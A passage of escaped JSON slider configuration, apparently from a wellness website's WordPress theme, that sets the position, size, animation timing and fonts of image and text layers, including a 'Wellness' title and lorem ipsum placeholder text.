To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7770,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Towel\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic4.png\",\"imageId\":3315},\"size\":{\"width\":{\"d\":{\"v\":\"600px\",\"e\":true},\"n\":{\"v\":\"240px\",\"e\":true},\"t\":{\"v\":\"240px\"},\"m\":{\"v\":\"240px\"}},\"height\":{\"d\":{\"v\":\"355px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"142px\"},\"m\":{\"v\":\"142px\"}},\"originalWidth\":600,\"originalHeight\":355,\"aspectRatio\":{\"d\":{\"v\":1.690140845070422503937379588023759424686431884765625},\"n\":{\"v\":1.690140845070422503937379588023759424686431884765625},\"t\":{\"v\":1.690140845070422503937379588023759424686431884765625},\"m\":{\"v\":1.690140845070422503937379588023759424686431884765625}}},\"position\":{\"x\":{\"d\":{\"v\":\"1139px\",\"e\":true},\"n\":{\"v\":\"860px\",\"e\":true},\"t\":{\"v\":\"510px\",\"e\":true},\"m\":{\"v\":\"510px\"}},\"y\":{\"d\":{\"v\":\"88px\",\"e\":true},\"n\":{\"v\":\"101px\",\"e\":true},\"t\":{\"v\":\"207px\",\"e\":true},\"m\":{\"v\":\"207px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Bochica\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic5.png\",\"imageId\":3316},\"size\":{\"width\":{\"d\":{\"v\":\"365px\",\"e\":true},\"n\":{\"v\":\"206px\",\"e\":true},\"t\":{\"v\":\"206px\",\"e\":true},\"m\":{\"v\":\"131px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"257px\",\"e\":true},\"n\":{\"v\":\"145px\",\"e\":true},\"t\":{\"v\":\"145px\",\"e\":true},\"m\":{\"v\":\"92px\",\"e\":true}},\"originalWidth\":365,\"originalHeight\":257,\"aspectRatio\":{\"d\":{\"v\":1.4202334630350195165959803489386104047298431396484375},\"n\":{\"v\":1.4202334630350195165959803489386104047298431396484375},\"t\":{\"v\":1.4202334630350195165959803489386104047298431396484375},\"m\":{\"v\":1.4202334630350195165959803489386104047298431396484375}}},\"position\":{\"x\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"412px\",\"e\":true},\"t\":{\"v\":\"112px\",\"e\":true},\"m\":{\"v\":\"31px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-54px\",\"e\":true},\"n\":{\"v\":\"-15px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Wellness \",\"alias\":\"Title\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"432px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"435px\",\"e\":true},\"n\":{\"v\":\"222px\",\"e\":true},\"t\":{\"v\":\"317px\",\"e\":true},\"m\":{\"v\":\"149px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1f1f1f\",\"e\":true},\"n\":{\"v\":\"#1f1f1f\",\"e\":true},\"t\":{\"v\":\"#1f1f1f\"},\"m\":{\"v\":\"#1f1f1f\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"85px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"85px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"85px\"},\"m\":{\"v\":\"85px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1f1f1f\",\"e\":true},\"n\":{\"v\":\"#1f1f1f\",\"e\":true},\"t\":{\"v\":\"#1f1f1f\"},\"m\":{\"v\":\"#1f1f1f\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"10\":{\"text\":\"Lorem ipsum dolor sit amet, in doctus voluptua mei. At sit nibh audire, eu qui legere alie.\",\"alias\":\"Paragraph\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"420px\",\"e\":true},\"n\":{\"v\":\"420px\",\"e\":true},\"t\":{\"v\":\"420px\"},\"m\":{\"v\":\"297px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"59px\",\"e\":true},\"n\":{\"v\":\"59px\",\"e\":true},\"t\":{\"v\":\"59px\"},\"m\":{\"v\":\"88px\",\"e\":true}},\"originalWidth\":\"420px\",\"originalHeight\":\"59px\"},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"434px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"544px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"421px\",\"e\":true},\"m\":{\"v\":\"239px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\"},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"30px\"},\"m\":{\"v\":\"29px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\"},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\"